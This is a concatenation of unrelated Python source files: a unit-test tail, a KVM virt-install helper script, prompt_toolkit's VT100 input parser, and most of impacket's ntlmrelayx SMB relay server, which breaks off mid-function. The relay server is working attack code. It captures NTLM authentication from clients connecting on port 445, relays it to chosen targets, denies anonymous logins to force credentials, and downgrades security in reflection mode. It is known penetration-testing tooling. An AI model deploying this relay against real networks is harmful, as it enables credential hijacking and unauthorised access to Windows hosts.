        data = read_all_data(ws, cached_reader2, session)
        self.assertEqual(sorted(data), list(range(100)))

        shutil.rmtree(path)

        # We removed cache so we expect to receive data from original reader
        workspace.ResetWorkspace()
        cached_reader3 = CachedReader(build_source_reader(300))
        init_step = cached_reader3.build_cache(path)
        session.run(init_step)

        data = read_all_data(ws, cached_reader3, session)
        self.assertEqual(sorted(data), list(range(300)))

        shutil.rmtree(path)
#!/usr/bin/env python """Python helper for virt-install(1)""" import os import platform import re import string import random import include_funcs import yaml __author__ = 'Jason Callaway' __email__ = 'jason@jasoncallaway.com' __license__ = 'Apache License Version 2.0' __version__ = '0.1' __status__ = 'alpha' class KVMInstall(object): def setup_lvm(self): """Setup the VMs root volume with LVM""" # Grab the config values we need from_lvm = self.config['clone'] size = str(self.config['disk']) name = self.config['name'] # Clone an LVM volume from the baseimage volume. command = ['lvcreate', '-s', from_lvm, '-L', size + 'G', '-n', name] try: self.funcs.run_command(command, self.config) except Exception, e: raise e def setup_image(self): """Setup the VMs root volume with an image file""" # Grab the config values we need from_image = self.config['image'] path = os.path.split(from_image)[0] extension = os.path.splitext(from_image)[1] size = self.config['disk'] name = self.config['name'] # Copy the base image to our new file. command = ['cp', from_image, path + '/' + name + extension] try: self.funcs.run_command(command, self.config) except Exception, e: raise e def generate_mac(self, prefix): """Generate a unique MAC address.""" generated_mac = '' # Determine how long our prefix is num_colons = prefix.count(':') # Add that number of hex substrings for _ in range(5 - num_colons): # This is a little big funky. I wanted to be sure we have only # a-f,0-9, but the string.hexdigits string includes a-f,A-F, # so we have to convert to lower case and strip out duplicates # which we do by adding them to a set. domain = ''.join(set(string.hexdigits.lower())) new_hex = self.funcs.get_random(domain, 2) generated_mac = generated_mac.join(':' + new_hex) return self.config['mac'] + generated_mac def generate_ip(self, **kwargs ): """Generate a unique IP address within the virsh DHCP scope.""" # We don't want to generate an IP outside the DHCP range in the virsh # network. 
ip_start, ip_end = self.funcs.get_ip_range(self.config) start = re.sub('^\d{1,3}\.\d{1,3}\.\d{1,3}\.', '', ip_start) end = re.sub('^\d{1,3}\.\d{1,3}\.\d{1,3}\.', '', ip_end) # For now we only generate the last octect in an IPv4 address. # TODO: add support for generating other octets first_three_octets = re.sub('\.\d{1,3}$', '', ip_start) if 'octet' in kwargs: return first_three_octets + '.' + kwargs['octet'] else: return first_three_octets + '.' + str(random.randint(int(start), int(end))) def setup_network(self): """Setup the virsh network settings for the VM.""" # Dump the network config to an xml file for 1) easy parsing and # 2) backup just in case something goes sideways. self.funcs.net_dumpxml(self.config) # TODO: Add IPv6 support # First, find a new mac address try: mac_addresses = self.funcs.get_mac_addresses(self.config) new_mac = '' good_mac = False while good_mac is False: new_mac = self.generate_mac(self.config['mac']) if new_mac not in mac_addresses: good_mac = True self.config['new_mac'] = new_mac if self.config['verbose'] is True: print ' new mac found: ' + new_mac except Exception, e: raise Exception('setup_network failed ' + 'to generate a new mac address: ' + str(e)) # Then find an IP address in range that doesn't already exist new_ip = '' ip_addresses = self.funcs.get_ip_addresses(self.config) if 'ipaddress' in self.config: if self.config['ipaddress'] not in ip_addresses: range_floor, range_ceiling = self.funcs.get_ip_range(self.config) new_ip = self.generate_ip(octet=self.config['ipaddress']) else: raise Exception('setup_network failed, ip address not ' + 'available' + self.config['ipaddress']) else: try: good_ip = False while good_ip is False: new_ip = self.generate_ip() if new_ip not in ip_addresses: good_ip = True if self.config['verbose'] is True: print ' new ip found: ' + new_ip except Exception, e: raise Exception('setup_network failed ' + 'to generate a new ip address: ' + str(e)) # Record the new IP for other functions' use 
self.config['new_ip'] = new_ip # Now generate the virst net-update command. command = ['virsh', 'net-update', self.config['network'], 'add-last', 'ip-dhcp-host'] host_xml = '"<host mac=\'' + new_mac + '\' name=\'' + \ self.config['name'] + '.' + self.config['domain'] + \ '\' ip=\'' + new_ip + '\'/>"' command.append(host_xml) # We need to run virsh net-edit twice, once for the running config # (current), then again for the persistent config (config). # To be sure we're not talking to the same List object, we'll # initialize two new ones with the contents of command[]. current_command = list(command) config_command = list(command) # Now, update the current config try: current_command.append('--current') self.funcs.run_command(current_command, self.config) except Exception, e: raise Exception('virsh net-update --current failed: ' + str(e)) # First, update the persistent config try: config_command.append('--config') self.funcs.run_command(config_command, self.config) except Exception, e: raise Exception('virsh net-update --config failed: ' + str(e)) # Now do the same for DNS # Lists are funny, so we're going to create a new one. Don't want # any elements left over from our old command[] command = list() command = ['virsh', 'net-update', self.config['network'], 'add-last', 'dns-host'] host_xml = '"<host ip=\'' + new_ip + '\'><hostname>' + \ self.config['name'] + '.' 
+ self.config['domain'] + \ '</hostname></host>"' command.append(host_xml) config_command = list(command) current_command = list(command) # Now, update the current config try: current_command.append('--current') self.funcs.run_command(current_command, self.config) except Exception, e: raise Exception('virsh net-update --current failed: ' + str(e)) # First, update the persistent config try: config_command.append('--config') self.funcs.run_command(config_command, self.config) except Exception, e: raise Exception('virsh net-update --config failed: ' + str(e)) def do_virtinstall(self): """Run the virt-install command, basically the last step.""" network_string = 'network:' + self.config['network'] + ',' + \ 'model=virtio,mac=' + self.config['new_mac'] command = ['virt-install', '--noautoconsole', '--hvm', '--vnc', '--name', self.config['name'], '--vcpus', str(self.config['vcpus']), '--ram', str(self.config['ram']), '--network', network_string, '--os-type', self.config['type'], '--os-variant', self.config['variant'], '--boot', 'hd'] if 'clone' in self.config: devpath = os.path.split(self.config['clone'])[0] install_command = command + ['--disk', 'path=' + devpath + '/' + self.config['name']] else: imgpath = os.path.split(self.config['image'])[0] install_command = command + ['--disk', 'path=' + imgpath + '/' + self.config['name'] + '.img' + ',size=' + str(self.config['disk']) + ',format=qcow2'] try: self.funcs.run_command(install_command, self.config) except Exception, e: raise e def __init__(self, parsed_args): # TODO: put in environemnt checks, i.e., does virt-install exist, etc. # TODO: verify that we're running as root. # Save relative path to module. # This is necessary because we don't know where the site-packages # directory will live, so we have to determine that at runtime. package_directory = os.path.dirname(os.path.abspath(__file__)) # Load include_vars and funcs. 
varsyaml = os.path.join(package_directory, 'include_vars.yaml') include_vars_yaml = open(varsyaml).read() self.vars = yaml.load(include_vars_yaml) self.funcs = include_funcs.KVMInstallFuncs() # Check to see if we're on a supported platform. if platform.dist()[0] not in self.vars['supported_platforms']: raise Exception('unsupported platform: ' + platform.dist()[0]) # This make my IDE happy self.config = {} # Parse the config file and build our config object if parsed_args.verbose is True: print ' parsing config file' if parsed_args.configfile is None: parsed_args.configfile = self.vars['default_config'] self.config = self.funcs.parse_config(parsed_args) # Set up our random string and temp directory domain = string.ascii_letters + string.digits random8 = self.funcs.get_random(domain, 8) stdout, stderr, virsh_netdumpxml = self.funcs.setup_tmp(random8) self.config['stdout'] = stdout self.config['stderr'] = stderr self.config['virsh_netdumpxml'] = virsh_netdumpxml # If we have both a clone and image config directive, prefer LVM if 'clone' in self.config: if self.config['verbose'] is True: print ' setting up lvm' self.setup_lvm() else: if self.config['verbose'] is True: print ' setting up image' if 'image' in self.config: self.setup_image() else: raise Exception('you must specify either an LVM ' + 'or file base image with -c or -i') # Now set up the new network try: if self.config['verbose'] is True: print ' setting up network' self.setup_network() except Exception, e: raise Exception('setup network failed: ' + str(e)) # Update /etc/hosts try: if self.config['verbose'] is True: print ' updating /etc/hosts' self.funcs.update_etchosts(self.config, 'add') except Exception, e: raise Exception('update /etc/hosts failed: ' + str(e)) # Restart the dnsmasq service try: if self.config['verbose'] is True: print ' restarting dnsmasq' self.funcs.restart_dnsmasq(self.config) except Exception, e: raise Exception('restart dnsmasq failed: ' + str(e)) # Finally, we can install the VM 
try: if self.config['verbose'] is True: print ' doing virt-install' self.do_virtinstall() except Exception, e: raise Exception('virt-install failed: ' + str(e))
""" Parser for VT100 input stream. """ from __future__ import unicode_literals import os import re import six import termios import tty from ..keys import Keys from ..key_binding.input_processor import KeyPress __all__ = ( 'InputStream', 'raw_mode', 'cooked_mode', ) _DEBUG_RENDERER_INPUT = False _DEBUG_RENDERER_INPUT_FILENAME = 'prompt-toolkit-render-input.log' # Regex matching any CPR response # (Note that we use '\Z' instead of '$', because '$' could include a trailing # newline.) _cpr_response_re = re.compile('^' + re.escape('\x1b[') + r'\d+;\d+R\Z') # Mouse events: # Typical: "Esc[MaB*" Urxvt: "Esc[96;14;13M" and for Xterm SGR: "Esc[<64;85;12M" _mouse_event_re = re.compile('^' + re.escape('\x1b[') + r'(<?[\d;]+[mM]|M...)\Z') # Regex matching any valid prefix of a CPR response. # (Note that it doesn't contain the last character, the 'R'. The prefix has to # be shorter.) _cpr_response_prefix_re = re.compile('^' + re.escape('\x1b[') + r'[\d;]*\Z') _mouse_event_prefix_re = re.compile('^' + re.escape('\x1b[') + r'(<?[\d;]*|M.{0,2})\Z') class _Flush(object): """ Helper object to indicate flush operation to the parser. """ pass # Mapping of vt100 escape codes to Keys. 
ANSI_SEQUENCES = { '\x1b': Keys.Escape, '\x00': Keys.ControlSpace, # Control-Space (Also for Ctrl-@) '\x01': Keys.ControlA, # Control-A (home) '\x02': Keys.ControlB, # Control-B (emacs cursor left) '\x03': Keys.ControlC, # Control-C (interrupt) '\x04': Keys.ControlD, # Control-D (exit) '\x05': Keys.ControlE, # Contrel-E (end) '\x06': Keys.ControlF, # Control-F (cursor forward) '\x07': Keys.ControlG, # Control-G '\x08': Keys.ControlH, # Control-H (8) (Identical to '\b') '\x09': Keys.ControlI, # Control-I (9) (Identical to '\t') '\x0a': Keys.ControlJ, # Control-J (10) (Identical to '\n') '\x0b': Keys.ControlK, # Control-K (delete until end of line; vertical tab) '\x0c': Keys.ControlL, # Control-L (clear; form feed) '\x0d': Keys.ControlM, # Control-M (13) (Identical to '\r') '\x0e': Keys.ControlN, # Control-N (14) (history forward) '\x0f': Keys.ControlO, # Control-O (15) '\x10': Keys.ControlP, # Control-P (16) (history back) '\x11': Keys.ControlQ, # Control-Q '\x12': Keys.ControlR, # Control-R (18) (reverse search) '\x13': Keys.ControlS, # Control-S (19) (forward search) '\x14': Keys.ControlT, # Control-T '\x15': Keys.ControlU, # Control-U '\x16': Keys.ControlV, # Control-V '\x17': Keys.ControlW, # Control-W '\x18': Keys.ControlX, # Control-X '\x19': Keys.ControlY, # Control-Y (25) '\x1a': Keys.ControlZ, # Control-Z '\x1c': Keys.ControlBackslash, # Both Control-\ and Ctrl-| '\x1d': Keys.ControlSquareClose, # Control-] '\x1e': Keys.ControlCircumflex, # Control-^ '\x1f': Keys.ControlUnderscore, # Control-underscore (Also for Ctrl-hypen.) '\x7f': Keys.Backspace, # (127) Backspace '\x1b[A': Keys.Up, '\x1b[B': Keys.Down, '\x1b[C': Keys.Right, '\x1b[D': Keys.Left, '\x1b[H': Keys.Home, '\x1bOH': Keys.Home, '\x1b[F': Keys.End, '\x1bOF': Keys.End, '\x1b[3~': Keys.Delete, '\x1b[3;2~': Keys.ShiftDelete, # xterm, gnome-terminal. 
'\x1b[1~': Keys.Home, # tmux '\x1b[4~': Keys.End, # tmux '\x1b[5~': Keys.PageUp, '\x1b[6~': Keys.PageDown, '\x1b[7~': Keys.Home, # xrvt '\x1b[8~': Keys.End, # xrvt '\x1b[Z': Keys.BackTab, # shift + tab '\x1b[2~': Keys.Insert, '\x1bOP': Keys.F1, '\x1bOQ': Keys.F2, '\x1bOR': Keys.F3, '\x1bOS': Keys.F4, '\x1b[11~': Keys.F1, # rxvt-unicode '\x1b[12~': Keys.F2, # rxvt-unicode '\x1b[13~': Keys.F3, # rxvt-unicode '\x1b[14~': Keys.F4, # rxvt-unicode '\x1b[15~': Keys.F5, '\x1b[17~': Keys.F6, '\x1b[18~': Keys.F7, '\x1b[19~': Keys.F8, '\x1b[20~': Keys.F9, '\x1b[21~': Keys.F10, '\x1b[23~': Keys.F11, '\x1b[24~': Keys.F12, '\x1b[25~': Keys.F13, '\x1b[26~': Keys.F14, '\x1b[28~': Keys.F15, '\x1b[29~': Keys.F16, '\x1b[31~': Keys.F17, '\x1b[32~': Keys.F18, '\x1b[33~': Keys.F19, '\x1b[34~': Keys.F20, '\x1b[1;5A': Keys.ControlUp, # Cursor Mode '\x1b[1;5B': Keys.ControlDown, # Cursor Mode '\x1b[1;5C': Keys.ControlRight, # Cursor Mode '\x1b[1;5D': Keys.ControlLeft, # Cursor Mode '\x1bOA': Keys.ControlUp, # Application Mode (tmux) '\x1bOB': Keys.ControlDown, # Application Mode (tmux) '\x1bOC': Keys.ControlRight, # Application Mode (tmux) '\x1bOD': Keys.ControlLeft, # Application Mode (tmux) '\x1b[5A': Keys.ControlUp, '\x1b[5B': Keys.ControlDown, '\x1b[5C': Keys.ControlRight, '\x1b[5D': Keys.ControlLeft, # Meta + arrow keys. Several terminals handle this differently. # The following sequences are for xterm and gnome-terminal. # (Iterm sends ESC followed by the normal arrow_up/down/left/right # sequences, and the OSX Terminal sends ESCb and ESCf for "alt # arrow_left" and "alt arrow_right." We don't handle these # explicitely, in here, because would could not distinguesh between # pressing ESC (to go to Vi navigation mode), followed by just the # 'b' or 'f' key. These combinations are handled in # the input processor.) 
# Meta/Alt + arrow keys. (These entries close the ANSI_SEQUENCES lookup
# table, which is opened earlier in this file.)
    '\x1b[1;3D': (Keys.Escape, Keys.Left),
    '\x1b[1;3C': (Keys.Escape, Keys.Right),
    '\x1b[1;3A': (Keys.Escape, Keys.Up),
    '\x1b[1;3B': (Keys.Escape, Keys.Down),
}


class _IsPrefixOfLongerMatchCache(dict):
    """
    Dictionary that maps input sequences to a boolean indicating whether
    there is any key that starts with these characters.

    Entries are computed lazily in ``__missing__`` and memoized in the dict
    itself, so each prefix is analysed at most once.
    """
    def __missing__(self, prefix):
        # (hard coded) If this could be a prefix of a CPR response, return
        # True.
        if (_cpr_response_prefix_re.match(prefix) or
                _mouse_event_prefix_re.match(prefix)):
            result = True
        else:
            # If this could be a prefix of anything else, also return True.
            result = any(v for k, v in ANSI_SEQUENCES.items()
                         if k.startswith(prefix) and k != prefix)

        # Memoize before returning so the next lookup is a plain dict hit.
        self[prefix] = result
        return result


# Module-level shared cache instance used by the parser below.
_IS_PREFIX_OF_LONGER_MATCH_CACHE = _IsPrefixOfLongerMatchCache()


class InputStream(object):
    """
    Parser for VT100 input stream.

    Feed the data through the `feed` method and the correct callbacks of the
    `input_processor` will be called.

    ::

        def callback(key):
            pass
        i = InputStream(callback)
        i.feed('data\x01...')

    :attr input_processor: :class:`~prompt_toolkit.key_binding.InputProcessor`
        instance.
    """
    # Lookup table of ANSI escape sequences for a VT100 terminal
    # Hint: in order to know what sequences your terminal writes to stdin, run
    #       "od -c" and start typing.

    def __init__(self, feed_key_callback):
        # Callback invoked with a KeyPress for every parsed key.
        assert callable(feed_key_callback)

        self.feed_key_callback = feed_key_callback
        self.reset()

        if _DEBUG_RENDERER_INPUT:
            # Raw-input debug log (binary append mode).
            self.LOG = open(_DEBUG_RENDERER_INPUT_FILENAME, 'ab')

    def reset(self, request=False):
        # NOTE(review): `request` is unused here; kept for interface
        # compatibility with callers elsewhere.
        self._start_parser()

    def _start_parser(self):
        """
        Start the parser coroutine.
        """
        self._input_parser = self._input_parser_generator()
        # Prime the coroutine so it is paused at its first `yield`.
        self._input_parser.send(None)

    def _get_match(self, prefix):
        """
        Return the key (or tuple of keys) that maps to this prefix, or None
        when there is no exact match.
        """
        # (hard coded) If we match a CPR response, return Keys.CPRResponse.
        # (This one doesn't fit in the ANSI_SEQUENCES, because it contains
        # integer variables.)
        if _cpr_response_re.match(prefix):
            return Keys.CPRResponse

        elif _mouse_event_re.match(prefix):
            return Keys.Vt100MouseEvent

        # Otherwise, use the mappings.
        try:
            return ANSI_SEQUENCES[prefix]
        except KeyError:
            return None

    def _input_parser_generator(self):
        """
        Coroutine (state machine) for the input parser.

        Receives characters one at a time via ``send``; the special `_Flush`
        sentinel forces whatever is buffered to be processed as-is.
        """
        prefix = ''
        retry = False
        flush = False

        while True:
            flush = False

            if retry:
                # Re-process the current `prefix` without consuming input.
                retry = False
            else:
                # Get next character.
                c = yield

                if c == _Flush:
                    flush = True
                else:
                    prefix += c

            # If we have some data, check for matches.
            if prefix:
                is_prefix_of_longer_match = _IS_PREFIX_OF_LONGER_MATCH_CACHE[prefix]
                match = self._get_match(prefix)

                # Exact matches found, call handlers..
                if (flush or not is_prefix_of_longer_match) and match:
                    self._call_handler(match, prefix)
                    prefix = ''

                # No exact match found.
                elif (flush or not is_prefix_of_longer_match) and not match:
                    found = False
                    retry = True

                    # Loop over the input, try the longest match first and
                    # shift.
                    for i in range(len(prefix), 0, -1):
                        match = self._get_match(prefix[:i])
                        if match:
                            self._call_handler(match, prefix[:i])
                            prefix = prefix[i:]
                            found = True

                    if not found:
                        # Nothing matched at all: emit the first character
                        # literally and keep parsing the remainder.
                        self._call_handler(prefix[0], prefix[0])
                        prefix = prefix[1:]

    def _call_handler(self, key, insert_text):
        """
        Callback to handler.

        A tuple key (e.g. (Escape, Left)) is expanded into one callback per
        key, each carrying the same `insert_text`.
        """
        if isinstance(key, tuple):
            for k in key:
                self._call_handler(k, insert_text)
        else:
            self.feed_key_callback(KeyPress(key, insert_text))

    def feed(self, data):
        """
        Feed the input stream (a text string; fed to the parser one
        character at a time).
        """
        assert isinstance(data, six.text_type)

        if _DEBUG_RENDERER_INPUT:
            self.LOG.write(repr(data).encode('utf-8') + b'\n')
            self.LOG.flush()

        for c in data:
            # Replace \r by \n. (Some clients send \r instead of \n when enter
            # is pressed. E.g. telnet and some other terminals.)
            # It's also too complicated to handle \r and \n separately in the
            # key bindings.
            if c == '\r':
                c = '\n'
            self._input_parser.send(c)

    def flush(self):
        """
        Flush the buffer of the input stream.

        This will allow us to handle the escape key (or maybe meta) sooner.
        The input received by the escape key is actually the same as the first
        characters of e.g. Arrow-Up, so without knowing what follows the escape
        sequence, we don't know whether escape has been pressed, or whether
        it's something else. This flush function should be called after a
        timeout, and processes everything that's still in the buffer as-is, so
        without assuming any characters will follow.
        """
        self._input_parser.send(_Flush)

    def feed_and_flush(self, data):
        """
        Wrapper around ``feed`` and ``flush``.
        """
        self.feed(data)
        self.flush()


class raw_mode(object):
    """
    Context manager that puts the terminal in raw mode for the duration of
    the ``with`` block, restoring the previous attributes on exit.

    ::

        with raw_mode(stdin):
            ''' the pseudo-terminal stdin is now used in raw mode '''
    """
    def __init__(self, fileno):
        self.fileno = fileno
        # Remember the current attributes so __exit__ can restore them.
        self.attrs_before = termios.tcgetattr(fileno)

    def __enter__(self):
        # NOTE: On os X systems, using pty.setraw() fails. Therefore we are
        # using this:
        newattr = termios.tcgetattr(self.fileno)
        newattr[tty.LFLAG] = self._patch(newattr[tty.LFLAG])
        termios.tcsetattr(self.fileno, termios.TCSANOW, newattr)

        # Put the terminal in cursor mode. (Instead of application mode.)
        os.write(self.fileno, b'\x1b[?1l')

    def _patch(self, attrs):
        # Disable echo, canonical (line-buffered) input, extended input
        # processing and signal generation.
        return attrs & ~(
            termios.ECHO |
            termios.ICANON |
            termios.IEXTEN |
            termios.ISIG)

    def __exit__(self, *a, **kw):
        termios.tcsetattr(self.fileno, termios.TCSANOW, self.attrs_before)

        # # Put the terminal in application mode.
        # self._stdout.write('\x1b[?1h')


class cooked_mode(raw_mode):
    """
    (The opposite of ``raw_mode``)::

        with cooked_mode(stdin):
            ''' the pseudo-terminal stdin is now used in cooked mode. '''
    """
    def _patch(self, attrs):
        # Re-enable the flags that raw_mode disables.
        return attrs | (
            termios.ECHO |
            termios.ICANON |
            termios.IEXTEN |
            termios.ISIG)
#!/usr/bin/env python
# Copyright (c) 2013-2016 CORE Security Technologies
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# SMB Relay Server
#
# Authors:
#  Alberto Solino (@agsolino)
#  Dirk-jan Mollema / Fox-IT (https://www.fox-it.com)
#
# Description:
#             This is the SMB server which relays the connections
#   to other protocols
# NOTE: This module is Python 2 code (ConfigParser, `except Exception, e`,
# dict.has_key, print statement).

from threading import Thread
import ConfigParser
import struct
import logging

from impacket import smb, ntlm
from impacket.nt_errors import STATUS_MORE_PROCESSING_REQUIRED, STATUS_ACCESS_DENIED, STATUS_SUCCESS
from impacket.spnego import SPNEGO_NegTokenResp, SPNEGO_NegTokenInit, TypesMech
from impacket.examples.ntlmrelayx.clients import SMBRelayClient, MSSQLRelayClient, LDAPRelayClient, HTTPRelayClient, IMAPRelayClient
from impacket.smbserver import SMBSERVER, outputToJohnFormat, writeJohnOutputToFile
from impacket.spnego import ASN1_AID
from impacket.examples.ntlmrelayx.utils.targetsutils import ProxyIpTranslator


class SMBRelayServer(Thread):
    """
    SMB server thread that accepts victim connections on port 445 and relays
    their NTLM authentication to a configured target protocol (SMB, MSSQL,
    LDAP(S), HTTP(S) or IMAP(S)) via the matching relay client.
    """

    def __init__(self, config):
        """
        Build an embedded SMBSERVER from a minimal in-memory config and hook
        the NEGOTIATE and SESSION_SETUP_ANDX commands so authentication can
        be intercepted and relayed.
        """
        Thread.__init__(self)
        self.daemon = True
        self.server = 0
        # Config object
        self.config = config
        # Current target IP
        self.target = None
        # Targets handler
        self.targetprocessor = self.config.target
        # Username we auth as gets stored here later
        self.authUser = None
        self.proxyTranslator = None

        # Here we write a mini config for the server
        smbConfig = ConfigParser.ConfigParser()
        smbConfig.add_section('global')
        smbConfig.set('global', 'server_name', 'server_name')
        smbConfig.set('global', 'server_os', 'UNIX')
        smbConfig.set('global', 'server_domain', 'WORKGROUP')
        smbConfig.set('global', 'log_file', 'smb.log')
        smbConfig.set('global', 'credentials_file', '')

        if self.config.outputFile is not None:
            smbConfig.set('global', 'jtr_dump_path', self.config.outputFile)

        # IPC always needed
        smbConfig.add_section('IPC$')
        smbConfig.set('IPC$', 'comment', '')
        smbConfig.set('IPC$', 'read only', 'yes')
        smbConfig.set('IPC$', 'share type', '3')
        smbConfig.set('IPC$', 'path', '')

        self.server = SMBSERVER(('0.0.0.0', 445), config_parser=smbConfig)
        self.server.processConfigFile()

        # Hook the two SMB commands we need to intercept; keep the original
        # handlers so we can delegate to them after relaying.
        self.origSmbComNegotiate = self.server.hookSmbCommand(smb.SMB.SMB_COM_NEGOTIATE, self.SmbComNegotiate)
        self.origSmbSessionSetupAndX = self.server.hookSmbCommand(smb.SMB.SMB_COM_SESSION_SETUP_ANDX,
                                                                  self.SmbSessionSetupAndX)
        # Let's use the SMBServer Connection dictionary to keep track of our client connections as well
        # TODO: See if this is the best way to accomplish this
        self.server.addConnection('SMBRelay', '0.0.0.0', 445)

    def SmbComNegotiate(self, connId, smbServer, SMBCommand, recvPacket):
        """
        Hook for SMB_COM_NEGOTIATE: pick the relay target for this victim,
        open the client connection to it, stash the connection state, then
        delegate to the original negotiate handler.
        """
        connData = smbServer.getConnectionData(connId, checkStatus=False)
        if self.config.mode.upper() == 'REFLECTION':
            # Reflection: relay back to the connecting client itself.
            self.target = ('SMB', connData['ClientIP'], 445)
        # if self.config.mode.upper() == 'TRANSPARENT' and self.proxytranslator is not None:
        #     translated = self.proxytranslator.translate(connData['ClientIP'],connData['ClientPort'])
        #     logging.info('Translated to: %s' % translated)
        #     if translated is None:
        #         self.target = connData['ClientIP']
        #     else:
        #         self.target = translated
        if self.config.mode.upper() == 'RELAY':
            # Get target from the processor
            # TODO: Check if a cache is better because there is no way to know which target was selected for this victim
            # except for relying on the targetprocessor selecting the same target unless a relay was already done
            self.target = self.targetprocessor.get_target(connData['ClientIP'])

        #############################################################
        # SMBRelay
        # Get the data for all connections
        smbData = smbServer.getConnectionData('SMBRelay', False)
        if smbData.has_key(self.target):
            # Remove the previous connection and use the last one
            smbClient = smbData[self.target]['SMBClient']
            del smbClient
            del smbData[self.target]

        logging.info("SMBD: Received connection from %s, attacking target %s" % (connData['ClientIP'], self.target[1]))
        try:
            if recvPacket['Flags2'] & smb.SMB.FLAGS2_EXTENDED_SECURITY == 0:
                extSec = False
            else:
                if self.config.mode.upper() == 'REFLECTION':
                    # Force standard security when doing reflection
                    logging.info("Downgrading to standard security")
                    extSec = False
                    # NOTE(review): '+=' with a bitwise complement looks odd;
                    # presumably this should clear the flag
                    # ('&= ~FLAGS2_EXTENDED_SECURITY'). Kept as-is — confirm.
                    recvPacket['Flags2'] += (~smb.SMB.FLAGS2_EXTENDED_SECURITY)
                else:
                    extSec = True
            # Init the correct client for our target
            client = self.init_client(extSec)
        except Exception, e:
            logging.error("Connection against target %s FAILED" % self.target[1])
            logging.error(str(e))
        else:
            encryptionKey = client.get_encryption_key()
            # Track the relay client for this target so SESSION_SETUP can use it.
            smbData[self.target] = {}
            smbData[self.target]['SMBClient'] = client
            if encryptionKey is not None:
                connData['EncryptionKey'] = encryptionKey
            smbServer.setConnectionData('SMBRelay', smbData)
            smbServer.setConnectionData(connId, connData)

        return self.origSmbComNegotiate(connId, smbServer, SMBCommand, recvPacket)
        #############################################################

    def SmbSessionSetupAndX(self, connId, smbServer, SMBCommand, recvPacket):
        """
        Hook for SMB_COM_SESSION_SETUP_ANDX: forward the victim's NTLM
        negotiate/authenticate messages to the target, mirror the target's
        challenge back to the victim, and launch the configured attack once
        authentication against the target succeeds.
        """
        connData = smbServer.getConnectionData(connId, checkStatus=False)
        #############################################################
        # SMBRelay
        smbData = smbServer.getConnectionData('SMBRelay', False)
        #############################################################

        respSMBCommand = smb.SMBCommand(smb.SMB.SMB_COM_SESSION_SETUP_ANDX)

        if connData['_dialects_parameters']['Capabilities'] & smb.SMB.CAP_EXTENDED_SECURITY:
            # Extended security. Here we deal with all SPNEGO stuff
            respParameters = smb.SMBSessionSetupAndX_Extended_Response_Parameters()
            respData = smb.SMBSessionSetupAndX_Extended_Response_Data()
            sessionSetupParameters = smb.SMBSessionSetupAndX_Extended_Parameters(SMBCommand['Parameters'])
            sessionSetupData = smb.SMBSessionSetupAndX_Extended_Data()
            sessionSetupData['SecurityBlobLength'] = sessionSetupParameters['SecurityBlobLength']
            sessionSetupData.fromString(SMBCommand['Data'])
            connData['Capabilities'] = sessionSetupParameters['Capabilities']

            if struct.unpack('B', sessionSetupData['SecurityBlob'][0])[0] != ASN1_AID:
                # If there no GSSAPI ID, it must be an AUTH packet
                blob = SPNEGO_NegTokenResp(sessionSetupData['SecurityBlob'])
                token = blob['ResponseToken']
            else:
                # NEGOTIATE packet
                blob = SPNEGO_NegTokenInit(sessionSetupData['SecurityBlob'])
                token = blob['MechToken']

            # Here we only handle NTLMSSP, depending on what stage of the
            # authentication we are, we act on it
            messageType = struct.unpack('<L', token[len('NTLMSSP\x00'):len('NTLMSSP\x00') + 4])[0]

            if messageType == 0x01:
                # NEGOTIATE_MESSAGE
                negotiateMessage = ntlm.NTLMAuthNegotiate()
                negotiateMessage.fromString(token)
                # Let's store it in the connection data
                connData['NEGOTIATE_MESSAGE'] = negotiateMessage

                #############################################################
                # SMBRelay: Ok.. So we got a NEGOTIATE_MESSAGE from a client.
                # Let's send it to the target server and send the answer back to the client.
                client = smbData[self.target]['SMBClient']
                challengeMessage = self.do_ntlm_negotiate(client, token)
                #############################################################

                respToken = SPNEGO_NegTokenResp()
                # accept-incomplete. We want more data
                respToken['NegResult'] = '\x01'
                respToken['SupportedMech'] = TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']
                respToken['ResponseToken'] = str(challengeMessage)

                # Setting the packet to STATUS_MORE_PROCESSING
                errorCode = STATUS_MORE_PROCESSING_REQUIRED
                # Let's set up an UID for this connection and store it
                # in the connection's data
                # Picking a fixed value
                # TODO: Manage more UIDs for the same session
                connData['Uid'] = 10
                # Let's store it in the connection data
                connData['CHALLENGE_MESSAGE'] = challengeMessage

            elif messageType == 0x03:
                # AUTHENTICATE_MESSAGE, here we deal with authentication
                #############################################################
                # SMBRelay: Ok, so now the have the Auth token, let's send it
                # back to the target system and hope for the best.
                client = smbData[self.target]['SMBClient']
                authenticateMessage = ntlm.NTLMAuthChallengeResponse()
                authenticateMessage.fromString(token)
                if authenticateMessage['user_name'] != '':
                    # For some attacks it is important to know the authenticated username, so we store it
                    connData['AUTHUSER'] = authenticateMessage['user_name']
                    self.authUser = connData['AUTHUSER']
                    clientResponse, errorCode = self.do_ntlm_auth(client, sessionSetupData['SecurityBlob'],
                                                                  connData['CHALLENGE_MESSAGE']['challenge'])
                    # clientResponse, errorCode = smbClient.sendAuth(sessionSetupData['SecurityBlob'],connData['CHALLENGE_MESSAGE']['challenge'])
                else:
                    # Anonymous login, send STATUS_ACCESS_DENIED so we force the client to send his credentials
                    errorCode = STATUS_ACCESS_DENIED

                if errorCode != STATUS_SUCCESS:
                    # Let's return what the target returned, hope the client connects back again
                    packet = smb.NewSMBPacket()
                    packet['Flags1'] = smb.SMB.FLAGS1_REPLY | smb.SMB.FLAGS1_PATHCASELESS
                    packet['Flags2'] = smb.SMB.FLAGS2_NT_STATUS | smb.SMB.FLAGS2_EXTENDED_SECURITY
                    packet['Command'] = recvPacket['Command']
                    packet['Pid'] = recvPacket['Pid']
                    packet['Tid'] = recvPacket['Tid']
                    packet['Mid'] = recvPacket['Mid']
                    packet['Uid'] = recvPacket['Uid']
                    packet['Data'] = '\x00\x00\x00'
                    packet['ErrorCode'] = errorCode >> 16
                    packet['ErrorClass'] = errorCode & 0xff
                    # Reset the UID
                    if self.target[0] == 'SMB':
                        client.setUid(0)
                    logging.error("Authenticating against %s as %s\%s FAILED" % (
                        self.target, authenticateMessage['domain_name'], authenticateMessage['user_name']))
                    # Log this target as processed for this client
                    self.targetprocessor.log_target(connData['ClientIP'], self.target)
                    # del (smbData[self.target])
                    return None, [packet], errorCode
                else:
                    # We have a session, create a thread and do whatever we want
                    logging.info("Authenticating against %s as %s\%s SUCCEED" % (
                        self.target, authenticateMessage['domain_name'], authenticateMessage['user_name']))
                    # Log this target as processed for this client
                    self.targetprocessor.log_target(connData['ClientIP'], self.target)
